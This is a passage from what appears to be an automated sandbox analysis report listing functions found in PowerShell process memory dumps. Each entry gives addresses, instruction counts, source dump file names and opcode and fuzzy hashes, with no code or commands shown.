                          Function 04EE7099 Relevance: .1, Instructions: 105COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 26f9c3a231271d1384253cfc38c6c98f9b63e8bc8cd589703f928f083437f73f
                          • Instruction ID: f806c5791ae2296c5ebb53a1972214b7d43c17269569bf2a78b4ef34a2e05b98
                          • Opcode Fuzzy Hash: 26f9c3a231271d1384253cfc38c6c98f9b63e8bc8cd589703f928f083437f73f
                          • Instruction Fuzzy Hash: D1411D34A04214CFCB14DF55C994ABABBF1EF8D314F145199D842AB3A5DB32EC45DB60
                          Function 04EEC478 Relevance: .1, Instructions: 101COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bc7bb7f23ad00c47049f67a8d0590a9d8dc57e225fe8b5e71399eb26ed45d332
                          • Instruction ID: 34af5dfdd3dc8d5e4171b786e25d8863aee80dc44ff77246b83a6f4aec6968f1
                          • Opcode Fuzzy Hash: bc7bb7f23ad00c47049f67a8d0590a9d8dc57e225fe8b5e71399eb26ed45d332
                          • Instruction Fuzzy Hash: F9318B353006019FD709EB79E944AAEB7AAEFC4315F108639D60ACB365DB74E805CBA1
                          Function 04EEAF50 Relevance: .1, Instructions: 89COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 761db11d22c13dab03412d6f0ae7ee782d2a7e55cdc08b66ba2d0e026f84f280
                          • Instruction ID: 82620633c587586072cd9d7f8d04ac389efd4336812887b1c76405da67b7f5c1
                          • Opcode Fuzzy Hash: 761db11d22c13dab03412d6f0ae7ee782d2a7e55cdc08b66ba2d0e026f84f280
                          • Instruction Fuzzy Hash: 1D316D70E012098FDB14EFAAD5947BEBBF2EF88314F14902DE405EB355EA75AC018B54
                          Function 04EEAF60 Relevance: .1, Instructions: 84COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f26ed6596beb155fa343a70acd87e1ec5debc1277be6ebee6b3afc48563e98d8
                          • Instruction ID: e604c363738c3ee693a17a0c5f3dd48fcd2e36b04d1092a2f027317b9889ce93
                          • Opcode Fuzzy Hash: f26ed6596beb155fa343a70acd87e1ec5debc1277be6ebee6b3afc48563e98d8
                          • Instruction Fuzzy Hash: BF315E70E012099FDB04DFAAD5947BEBBF6EF88300F109029E405EB354EA75AC018B54
                          Function 04EEAE18 Relevance: .1, Instructions: 82COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 076511b9f14efaf97c95bfa57dc069e728f9767b5199c3b3f83720d6b460d37f
                          • Instruction ID: cc9bb1561489e94663f6d1b88ba1f51e3e3b9279be2cdabbd7e1e7d3ce7a0034
                          • Opcode Fuzzy Hash: 076511b9f14efaf97c95bfa57dc069e728f9767b5199c3b3f83720d6b460d37f
                          • Instruction Fuzzy Hash: 4F316EB8A002059FDB04DF68E458ABE7BB6FFC4300F1184BDC111AF3A5CA799D018B51
                          Function 04EEAE28 Relevance: .1, Instructions: 77COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 47437bcc23a30ed3514d229b19c5ebe16cb51d1157fef83049397d5ea63f3266
                          • Instruction ID: 910e42458e701df06ccd477c9d233b33bec2e2651296c6b668220f5c23a36e45
                          • Opcode Fuzzy Hash: 47437bcc23a30ed3514d229b19c5ebe16cb51d1157fef83049397d5ea63f3266
                          • Instruction Fuzzy Hash: 2F313278A002059FDB04EF68E558ABF77B6FFC4300F108479D611AB3A5DA399D418B91
                          Function 035DF3D8 Relevance: .1, Instructions: 76COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2188293967.00000000035DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035DD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_35dd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 60aef856905e9625b44bef16752ef6824b1290ace3aef0e90c17e53e63e6bcbe
                          • Instruction ID: 12834d25ac27b3169788fbe4c5e30852eeb4b350b5887df3ffcc6ca71f716616
                          • Opcode Fuzzy Hash: 60aef856905e9625b44bef16752ef6824b1290ace3aef0e90c17e53e63e6bcbe
                          • Instruction Fuzzy Hash: 1221C475508200EFCB15DF58E9C0B26BF65FB88314F24C9ADE90A4A266C73AD456CBA1
                          Function 04EE94D8 Relevance: .1, Instructions: 75COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ee03290129313c09becd44d8df86a59d5f9e93ab674d09f38b7be8f99b5871eb
                          • Instruction ID: c84d0d2b770c2dd30255166244f9aab7bc54bfd8b8d4995cac39ed6a357ef3e6
                          • Opcode Fuzzy Hash: ee03290129313c09becd44d8df86a59d5f9e93ab674d09f38b7be8f99b5871eb
                          • Instruction Fuzzy Hash: 19316BB4D063448EDB60DF6AD0887AAFFE2EF88324F28845ED44D97216D674A485CB61
                          Function 04EE7081 Relevance: .1, Instructions: 75COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 73fbd54d15927c539b434740ca4b92c7c052a8276d3d92dbce11b02bfec097f5
                          • Instruction ID: 6dd66d3ac86f584cd0de7da7de8e9157855e5004d9d674eeb03bd19b28714dc8
                          • Opcode Fuzzy Hash: 73fbd54d15927c539b434740ca4b92c7c052a8276d3d92dbce11b02bfec097f5
                          • Instruction Fuzzy Hash: DF212E34A04245CFDB14DF65C854ABDBFF1AF4A319F146299D442AB3A1DB32EC41DB24
                          Function 035DF02C Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2188293967.00000000035DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035DD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_35dd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0f3bc911a5105318758b43dd1e4e571d05dd69add8cf1cdff0bc80bcfb52f074
                          • Instruction ID: c54fa15df8b7d7ed776c3fc2bf204b7a03480e4af56ad167e17ffadce0d93234
                          • Opcode Fuzzy Hash: 0f3bc911a5105318758b43dd1e4e571d05dd69add8cf1cdff0bc80bcfb52f074
                          • Instruction Fuzzy Hash: 7021F575504244DFCB24DF28F9C4B16BFA9FB88314F24C9A9D90B4B366C33AD446CA61
                          Function 04EE94E8 Relevance: .1, Instructions: 69COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8acee457854becdcf6016f13df9f02405588fa448d7afe3cd5be3dfffdb9783a
                          • Instruction ID: dd92159159ecc8b456dfe2b0c68fb218d95286e00214df6b097dfb1f4cace2bd
                          • Opcode Fuzzy Hash: 8acee457854becdcf6016f13df9f02405588fa448d7afe3cd5be3dfffdb9783a
                          • Instruction Fuzzy Hash: A1218BB0D053048EDB60DF6AD08839AFFF6EB88314F28C41ED84D97206D6746485CB60
                          Function 04EE7744 Relevance: .1, Instructions: 62COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c62d08e8607b40a3355a2583a5811868423bb4ae48e43cf48d237a94d82fd932
                          • Instruction ID: 670be0386d56a2e3e7cd08821c59118cea5cb1f3da965baccadbb365b4da8c6c
                          • Opcode Fuzzy Hash: c62d08e8607b40a3355a2583a5811868423bb4ae48e43cf48d237a94d82fd932
                          • Instruction Fuzzy Hash: 98112B39700219CFCF04DBA9E9409AE77F6EFCC656B0140A5E909DB325DB34ED068B91
                          Function 035DF3D3 Relevance: .1, Instructions: 57COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2188293967.00000000035DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035DD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_35dd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                          • Instruction ID: ba834e9d5cda58a22869e8400cfaff1eee1f14ebec99cd84e565be3ae1414a23
                          • Opcode Fuzzy Hash: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                          • Instruction Fuzzy Hash: A6219D76504240DFCF16CF14E9C4B16BF72FB88314F28C5A9D9494A666C33AD46ACBA2
                          Function 035DF027 Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2188293967.00000000035DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035DD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_35dd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1c630ef97dc4b8389091dc56a6dd1508d93e44345cafe45a147f51fb8e987ca5
                          • Instruction ID: 19357d1b5637b3b7ca11e6275031e6e264a3115e1702ebfb9d667618fe1492b0
                          • Opcode Fuzzy Hash: 1c630ef97dc4b8389091dc56a6dd1508d93e44345cafe45a147f51fb8e987ca5
                          • Instruction Fuzzy Hash: 53119075504280DFDB15CF14E5C4B15FFA1FB84318F28C6A9D84A4B666C33AD44ACB61
                          Function 04EEBDD0 Relevance: .1, Instructions: 52COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 28bff56b3f56478c395de6a96535120180ce7554210ae8b0e457d0d5ffc66c18
                          • Instruction ID: 49e85bdb8dd7523e0b0f606624f447e754baf6f0324cbe3d95c96189252eb765
                          • Opcode Fuzzy Hash: 28bff56b3f56478c395de6a96535120180ce7554210ae8b0e457d0d5ffc66c18
                          • Instruction Fuzzy Hash: CD01D6316097449FC715DB79D59466A7FF0EF45214F1844DED089CB6B2CA61FC44C701
                          Function 04EEF3A8 Relevance: .0, Instructions: 48COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0ac8384cc4173fbd42ac63f3ded85df62d6cdc213cd791ad60db9761e82d7a24
                          • Instruction ID: dd7eff7e75c8560580a94c2b5b595009627bac6faa4f36eae943fd9f896e75eb
                          • Opcode Fuzzy Hash: 0ac8384cc4173fbd42ac63f3ded85df62d6cdc213cd791ad60db9761e82d7a24
                          • Instruction Fuzzy Hash: EA110935204754CFC728DF75D48086ABBF6EF8931532089ADD44A8B7A0DB36F845CB50
                          Function 035DD005 Relevance: .0, Instructions: 47COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2188293967.00000000035DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035DD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_35dd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 634f106deb00097dd9d4839e6b84cab968a1ee72f9b149fe53f41786afba9e68
                          • Instruction ID: 173fcf988ffa4805b636cbeea7cffb84f77ad7a9e173c7b986bf853fd55f6cd8
                          • Opcode Fuzzy Hash: 634f106deb00097dd9d4839e6b84cab968a1ee72f9b149fe53f41786afba9e68
                          • Instruction Fuzzy Hash: D801807100D3C09FD7228B25AD84652BFB8EF43220F1D84DBE8888F1A3D2695C45C772
                          Function 035DD01D Relevance: .0, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2188293967.00000000035DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035DD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_35dd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cc294b09abb4f6d2a640fc7f3890ae7f3ce43cfb49397ce1f84f6a7d90ed4ac1
                          • Instruction ID: f8d7145915085297588ff5ee8a1ed3e56572b21ad2c9d49014617b1d1072a3f6
                          • Opcode Fuzzy Hash: cc294b09abb4f6d2a640fc7f3890ae7f3ce43cfb49397ce1f84f6a7d90ed4ac1
                          • Instruction Fuzzy Hash: 2C01D4710043409AD730CA1AFD84B66BFECFF85320F18C469ED480A256E2799841C6B1
                          Function 04EEC000 Relevance: .0, Instructions: 44COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 93d12ef39a307b1702d9dd5dd65789df9ac404e1b3eb999ab4d248641384ffda
                          • Instruction ID: 9f67290d84618e582ba8f0bca796147062366db6a29e7d64b2fa96b4615aa7c5
                          • Opcode Fuzzy Hash: 93d12ef39a307b1702d9dd5dd65789df9ac404e1b3eb999ab4d248641384ffda
                          • Instruction Fuzzy Hash: 64F0A4753093905FD7118A7A9C94D7B7FE9EF8612070941BAF444C7362D6B4CC04C760
                          Function 04EEC010 Relevance: .0, Instructions: 38COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2365797c64fd2493e41d30cf6c316622ea2375925ca33a7655b4dc6756311bba
                          • Instruction ID: 6fccf5e21d6012dee51d8933879f1a7f432c961ee3a968600ba22eaf2e4cc947
                          • Opcode Fuzzy Hash: 2365797c64fd2493e41d30cf6c316622ea2375925ca33a7655b4dc6756311bba
                          • Instruction Fuzzy Hash: 81F0BE323082645FD7108AAA9C44DBBBFEDEBC9620B04407AF948C3351CAB1CC0086A0
                          Function 035DD9A7 Relevance: .0, Instructions: 37COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2188293967.00000000035DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035DD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_35dd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 089cc20ff8fbc4e9eed806cebdd1730d1cf27ae6edb8b11576abd6656ad94890
                          • Instruction ID: 68c00f49f0f01eedfa573b3984ffb4f92d96e7011cbbaf70c6ef3892cf9bb670
                          • Opcode Fuzzy Hash: 089cc20ff8fbc4e9eed806cebdd1730d1cf27ae6edb8b11576abd6656ad94890
                          • Instruction Fuzzy Hash: 16F0E7B6200600AFD720CF0AD985C22FBFDEFD4670719C55AE84A4B611C671EC42CAA0
                          Function 04EE91C0 Relevance: .0, Instructions: 35COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2df224c25e9ab00195ddec76715a2c2163067f220a64a83e31ad30f630474803
                          • Instruction ID: 64abfd9085bd33990a9e8a0629a2a761ccfe9e01f3ed0497ab7e99092f1e60f6
                          • Opcode Fuzzy Hash: 2df224c25e9ab00195ddec76715a2c2163067f220a64a83e31ad30f630474803
                          • Instruction Fuzzy Hash: 1CF0FC75B042414FD715AB24D0583AB7B71EFC1314F1481AEC5055B756CD795C06C7A1
                          Function 04EEDF20 Relevance: .0, Instructions: 34COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b9e697d939a9aca931a88436d400c03cb3f6a463872d687c918e830c740f760b
                          • Instruction ID: 0cd7df7c959450d7222efc2e16b0e3558656a255930a614f99236a49d61b6b3f
                          • Opcode Fuzzy Hash: b9e697d939a9aca931a88436d400c03cb3f6a463872d687c918e830c740f760b
                          • Instruction Fuzzy Hash: ACF05E397152404FC3119B2ED894C76BBF6AFCA71931910DEE099CB372DAA2DC02CB50
                          Function 04EE7A30 Relevance: .0, Instructions: 33COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2ae1cdca574633a548897c9c4b9f0a2f6b998c9f9801bf9104cda818d64efd1e
                          • Instruction ID: 7bfce93e935ce5190c83daed7ee3ee219e0db3242aa073acec8562d70176a451
                          • Opcode Fuzzy Hash: 2ae1cdca574633a548897c9c4b9f0a2f6b998c9f9801bf9104cda818d64efd1e
                          • Instruction Fuzzy Hash: 04F082357006149FCB249B6AE844A7F77E9EB882A5B40062DE10AD3310DE71AC458790
                          Function 035DD998 Relevance: .0, Instructions: 33COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2188293967.00000000035DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035DD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_35dd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 554aecd4693e4d0b266c62cba81104dd70c14c719bbff593219bb9345430a95b
                          • Instruction ID: 82b7099682ccae69630762b4056e89701d8e4cdb316f9198546f55e8d71582fd
                          • Opcode Fuzzy Hash: 554aecd4693e4d0b266c62cba81104dd70c14c719bbff593219bb9345430a95b
                          • Instruction Fuzzy Hash: FBF0FF75100640AFD725CF05DD85D23BBF9FF85620B198489E84A5B712C631FC42CF60
                          Function 04EE775F Relevance: .0, Instructions: 31COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c7ce0b77eb2236cc6f6310d44e0abb87ed9e2a6ccdb4337d763f0488ed6d7556
                          • Instruction ID: 25ddc058608b993b6a66f319aa38b8cde45589ac1d3e325c039129a3ad377949
                          • Opcode Fuzzy Hash: c7ce0b77eb2236cc6f6310d44e0abb87ed9e2a6ccdb4337d763f0488ed6d7556
                          • Instruction Fuzzy Hash: 7DF0A039700515CFDB00DBADE9409AA7BA6EFC86567014195E80ACB324DF34DC068B91
                          Function 04EE91D0 Relevance: .0, Instructions: 31COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2f881acb56dee516609e25c30ee345be9caa33b26da16174e58c3b04d34466ae
                          • Instruction ID: 6762cd9e78625ba3c60a3d9066afdf63606839fdb7110020ac8d7c1c4d9c4b83
                          • Opcode Fuzzy Hash: 2f881acb56dee516609e25c30ee345be9caa33b26da16174e58c3b04d34466ae
                          • Instruction Fuzzy Hash: 38F02779A042048BE314BB69D0187EB77A6EFC1314F10813AC6065B399CE3A6802C7E1
                          Function 04EE9240 Relevance: .0, Instructions: 31COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ee8b1dedd5db3db7e0eb23a3973d738f66d386629c71858c552c015cab9a55ee
                          • Instruction ID: 221fc0644ec3079e2702143ad170effa2ef2fff44a1dd72ebb2342c550250a7d
                          • Opcode Fuzzy Hash: ee8b1dedd5db3db7e0eb23a3973d738f66d386629c71858c552c015cab9a55ee
                          • Instruction Fuzzy Hash: 18F054706093404FDB629B78E4DC3967FB1EB46310F0444AED55ACB292CB796884CB51
                          Function 04EEDD70 Relevance: .0, Instructions: 31COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9d9d25a5adbda5879deaaa88e57bf93c9c180b00c74c942582934ed417a7a04f
                          • Instruction ID: 26b96994f62e345c4ab3730916e982214422a2878af4c746498d63447ee2babc
                          • Opcode Fuzzy Hash: 9d9d25a5adbda5879deaaa88e57bf93c9c180b00c74c942582934ed417a7a04f
                          • Instruction Fuzzy Hash: C1F0EC3120A7812BC717936E6814C5F7FE9DEC6170304459EE045CB262C994DC05C7B7
                          Function 04EE9629 Relevance: .0, Instructions: 30COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 13cc87d20588010f82cb3659d1d3d0f5861912da89429e6e3c93a95a40619f2b
                          • Instruction ID: f1f8b687693c9e43b998761a0697e1f2aa182164f8342e9baf8688a0edb7f842
                          • Opcode Fuzzy Hash: 13cc87d20588010f82cb3659d1d3d0f5861912da89429e6e3c93a95a40619f2b
                          • Instruction Fuzzy Hash: 1CE068623072424B831733BF14106BA59CE4FE21B8B08177B8560CB2C3DCA5CC0143E1
                          Function 04EEDF30 Relevance: .0, Instructions: 30COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 72d4371491910d258364473b548be7aa626e28808351673d2d31a17ee7ac0baf
                          • Instruction ID: 1947c0a1dab5cd2c2c28adb7616599fecb7bba47fecbbf13a74d84678e427062
                          • Opcode Fuzzy Hash: 72d4371491910d258364473b548be7aa626e28808351673d2d31a17ee7ac0baf
                          • Instruction Fuzzy Hash: B5E0E5357406118F8310DB1ED898C2AB7EAEFCEB2571910AAF549CB375DA61EC01CB90
                          Function 04EEDDC1 Relevance: .0, Instructions: 29COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 992b17435754784a71e07b69a3d875dca94cd57fb68f9b0e6266e30e08ecbee0
                          • Instruction ID: eddbed72f21752788e5071b38fb832ad960e33182e04ea1fc9513f90420f5996
                          • Opcode Fuzzy Hash: 992b17435754784a71e07b69a3d875dca94cd57fb68f9b0e6266e30e08ecbee0
                          • Instruction Fuzzy Hash: 92E02B31B04041A7CB19C29DD8448FAFFB6DFC9320F04847EE80697350DA715816E7E0
                          Function 04EE8A4A Relevance: .0, Instructions: 29COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6e39194f79627ff63b87cfeaf9cb0bde4f5572e27e8a20f2d261868c4bd3b6f6
                          • Instruction ID: 45ec0a5de33c77b93df66d97be4705be7a56b078322427fa21c2390ebff00623
                          • Opcode Fuzzy Hash: 6e39194f79627ff63b87cfeaf9cb0bde4f5572e27e8a20f2d261868c4bd3b6f6
                          • Instruction Fuzzy Hash: 04F0A03530E2904BCB0A77B8A55C1AD3F62EBC2228F0400AFD20A8B243CEB948058796
                          Function 04EEB078 Relevance: .0, Instructions: 25COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 02e157b4ec2c50fc63bd3b0af8f4827f6d1fc5f058d3d5e134bef868b17d684c
                          • Instruction ID: ffccc2fddb4e2a6e95f70a7fea63a7ae5d34442710eed46ed5e85d55eff02dea
                          • Opcode Fuzzy Hash: 02e157b4ec2c50fc63bd3b0af8f4827f6d1fc5f058d3d5e134bef868b17d684c
                          • Instruction Fuzzy Hash: 46E0C22630E3D41B5B17923E68204663FAB8BCF22430EC0FAE548CB252CC929C0743A5
